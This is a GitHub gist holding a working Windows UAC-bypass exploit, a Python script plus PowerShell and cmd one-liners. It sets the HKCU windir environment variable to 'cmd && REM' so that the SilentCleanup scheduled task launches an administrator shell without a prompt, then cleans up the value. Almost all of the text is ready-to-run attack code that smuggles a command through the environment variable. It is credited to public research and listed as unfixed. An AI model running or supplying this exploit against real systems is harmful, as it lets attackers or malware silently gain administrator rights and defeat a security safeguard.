Last active
June 17, 2021 21:13
-
-
Save makelariss/21b9a1a8fcadab346a619fe64f1b171c to your computer and use it in GitHub Desktop.
Tested on Microsoft Windows [Version 10.0.16299.248]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html | |
''' | |
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting. | |
It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment) | |
We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task. | |
''' | |
from _winreg import * | |
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) | |
registrykey = OpenKey(HKCU, 'Environment', 0, KEY_ALL_ACCESS) | |
print "Modifying windir environment variable" | |
SetValueEx(registrykey, 'windir', 0, REG_SZ, 'cmd && REM') # so our payload will basically be (cmd && REM\system32\cleanmgr.exe) and REM comments out the rest of the line | |
print "Setting payload" | |
from ctypes.wintypes import * | |
from ctypes import * | |
shell32 = WinDLL('shell32' , use_last_error=True) | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
LPCTSTR = c_char_p | |
# Contains information used by ShellExecuteEx. | |
# https://msdn.microsoft.com/en-us/library/windows/desktop/bb759784(v=vs.85).aspx | |
class ShellExecuteInfo(Structure): # typedef struct _SHELLEXECUTEINFO | |
_fields_ = [ # { | |
('cbSize', DWORD), # DWORD cbSize; | |
('fMask', ULONG), # ULONG fMask; | |
('hwnd', HWND), # HWND hwnd; | |
('lpVerb', LPCTSTR), # LPCTSTR lpVerb; | |
('lpFile', LPCTSTR), # LPCTSTR lpFile; | |
('lpParameters', LPCTSTR), # LPCTSTR lpParameters; | |
('lpDirectory', LPCTSTR), # LPCTSTR lpDirectory; | |
('nShow', c_int), # int nShow; | |
('hInstApp', HINSTANCE), # HINSTANCE hInstApp; | |
('lpIDList', LPVOID), # LPVOID lpIDList; | |
('lpClass', LPSTR), # LPCTSTR lpClass; | |
('hKeyClass', HKEY), # HKEY hkeyClass; | |
('dwHotKey', DWORD), # DWORD dwHotKey; | |
('hIcon', HANDLE), # union { HANDLE hIcon; HANDLE hMonitor;} | |
('hProcess', HANDLE) # HANDLE hProcess; | |
] # } | |
PShellExecuteInfo = POINTER(ShellExecuteInfo) | |
ShellExecuteEx = shell32.ShellExecuteEx | |
ShellExecuteEx.restype = BOOL | |
ShellExecuteEx.argtypes = [ | |
PShellExecuteInfo | |
] | |
SW_HIDE = 0 | |
ShellExecute = ShellExecuteInfo() | |
ShellExecute.cbSize = sizeof(ShellExecute) | |
ShellExecute.lpFile = u'schtasks.exe' | |
ShellExecute.lpParameters = u'/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I' | |
ShellExecute.nShow = SW_HIDE | |
ShellExecuteEx(byref(ShellExecute)) | |
print "Triggering SilentCleanup, should spawn a shell with administrative privileges" | |
import time; time.sleep(1) | |
DeleteValue(registrykey, 'windir') | |
CloseKey(registrykey) | |
''' | |
Windows PowerShell | |
Copyright (C) Microsoft Corporation. All rights reserved. | |
PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd && REM" | Out-Null | |
PS C:\Users\uknown> Start-Process -FilePath "schtasks.exe" -ArgumentList "/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I" | |
PS C:\Users\uknown> Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" -ErrorAction SilentlyContinue | Out-Nul | |
''' | |
''' | |
Microsoft Windows [Version 10.0.16299.248] | |
(c) 2017 Microsoft Corporation. All rights reserved. | |
C:\Users\uknown>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM " && schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I | |
''' | |
''' | |
34. | |
- Author: James Forshaw | |
- Type: Shell API | |
- Method: Environment variables expansion | |
- Target(s): \system32\svchost.exe via \system32\schtasks.exe | |
- Component(s): Attacker defined | |
- Works from: Windows 8.1 (9600) | |
- AlwaysNotify compatible | |
- Fixed in: unfixed 🙈 | |
- How: - | |
''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment